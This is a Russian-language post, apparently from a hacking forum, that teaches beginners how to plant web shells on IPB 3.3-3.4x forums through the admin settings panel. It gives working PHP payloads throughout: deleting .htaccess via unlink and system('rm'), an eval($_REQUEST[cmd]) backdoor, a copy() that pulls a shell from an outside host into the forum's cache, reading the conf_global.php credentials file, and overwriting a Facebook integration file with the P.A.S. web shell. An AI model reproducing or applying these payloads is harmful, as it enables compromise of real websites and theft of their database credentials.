Купить дедик, RDP, сервер
dyncheck.com - динамический рантайм чекер файлов

Заливка шелла на IPB 3.3-3.4x - способы или полезно знать[новичкам]

F

FRANKENSTEIN

Рано или поздно, многие сталкиваются с таким этапом как заливка шелла.
Есть несколько довольно простых способов заливки, которые можно легко и просто загуглить в нете, такие как заливка шелла через "загрузку архива с изображениями", или через настройки и шаблон. Но не у всех получается потому как сталкиваются с такими проблемами как ошибки403 и 500. Или шелл залился или же залился но прав нет ну или какие то другие причины в зависимости от того как настроен веб сервер. Сейчас Мы рассмотрим с Вами все варианты.

Вариант 1
И так, Вы заливаете шелл, и 403 - нет прав.
К примеру Вы залили шелл через "загрузку изображений", обращаетесь к нему:
www.site.ru/forum/public/style_images/master/shell.php (http://www.site.ru/forum/public/style_images/master/shell.php)
и видите - 403 Forbidden.
Логично предположить что в под папке находится файл настройки аппатча .htaccess и запрещает доступ для всех типов подобных файлов. Можно попробовать его удалить.
Идем в раздел админки "Настройки" - "Глобальные настройки" - "Добавить настройку"
везде пишем что то вроде 123qq а в окошке с php


unlink('web/htdocs/www.site.ru/home/forum/public/style_images/.htaccess');


Где: web/htdocs/www.site.ru/home/forum/public/style_images/ (http://www.site.ru/home/forum/public/style_images/) полный путь до файла, который можно узнать там же в настройках.

Сохраняем, и пробуем обратиться к нашему шеллу, если веб сервер имеет права на удаление .htaccess без рута, то он удалится. Если Вы заливали шелл в папку аплоадс через настройки, соответственно удаляем в папке uploads.

Вариант 2
Если через unlink удаление не работает, можно попробовать удалить вот таким способом, используя команды linux

Идем в раздел админки "Настройки" - "Глобальные настройки" - "Добавить настройку"
везде пишем что то вроде 123qq а в окошке с php


print $query='cd web/htdocs/www.site.ru/home/forum/public/style_images;rm -r .htaccess;ls -la';
system($query,$out);
print $out;


Вариант 3

Через настройки можно использовать так же мини шелл
Идем в раздел админки "Настройки" - "Глобальные настройки" - "Добавить настройку"
везде пишем что то вроде 123qq а в окошке с php


eval($_REQUEST[cmd]);


Обращаемся к нему таким образом, после сохранения настройки, заходим еще раз в глобальные настройки, что бы в адресной строке был примерно такой адрес:
http://site.ru/forum/admin/index.php...&conf_group=11 (http://site.ru/forum/admin/index.ph...ction=settings&&do=setting_view&conf_group=11)

т.е. оканчивалось на conf_group=11, где 11 это группа тут может быть любая цифра у Вас.
И обращаемся:
conf_group=11&cmd=
например phpinfo

http://site.ru/forum/admin/index.php...cmd=phpinfo(); (http://site.ru/forum/admin/index.ph...&do=setting_view&conf_group=11&cmd=phpinfo();)

или заливка шелла через него:
conf_group=11&cmd=copy($_REQUEST[a],$_REQUEST);&a=http://shellsite.ru/shell.txt&b=/web...ache/shell.php (http://shellsite.ru/shell.txt&b=/web/htdocs/www.site.ru/home/forum/cache/shell.php)

листинг файлов в каталоге:
conf_group=11&cmd=print_r(scandir('./'));
или conf_group=11&cmd=print_r(scandir('/web/htdocs/www.site.ru/home/forum/cache/')); (http://www.site.ru/home/forum/cache/'));)

просмотр файла, к примеру:
conf_group=11&cmd=print_r(file(%27/web/htdocs/www.site.ru/home/forum/conf_global.php%27)); (http://www.site.ru/home/forum/conf_global.php'));)
После жмем, показать исходный код, чтобы было удобно читать файл.

Вариант 4
При попытке залить файл в любую из папок, видим ошибку 500 - Internal Server Error
По всей вероятности файл залился, но доступа к нему не будет, но можно обращаться ведь к уже существующим и рабочим файлам форума. Можно к примеру слегка нарушить авторизацию фейсбука
Пробуем обратиться например к этому файлу на форуме: www.site.ru/forum/interface/facebook/channel.php (http://www.site.ru/forum/interface/facebook/channel.php)
Если Мы видим белый экран, значит на него можно будет подцепить шелл.

Идем в настройки - глобальные настройки - добавляем настройку с таким пхп кодом:
где web/htdocs/www.site.ru/home/forum/interface/facebook/channel.php (http://www.site.ru/home/forum/interface/facebook/channel.php) - полный путь от корня


fwrite($con_file, $text); fclose($con_file);

В данном случае вебшелл P.A.S.v.3.1.3 с паролем 123
Пробуем еще раз обратиться к этому файлу на форуме: www.site.ru/forum/interface/facebook/channel.php (http://www.site.ru/forum/interface/facebook/channel.php)
и все работает.

Вариант 4

Так же можно воспользоваться linux командами.
Создаем так же настройку, где пхп вставляем код:
PHP код:
print $query='cd /var/www/html/;ls -la';
system($query,$out);
print $out;


где в print $query='ваша команда linux';
к примеру сat /web/htdocs/www.site.ru/home/forum/conf_global.php (http://www.site.ru/home/forum/conf_global.php) - просмотр файла


Данные способы можно взять на заметку и использовать не только на ипб, но и во многих других местах.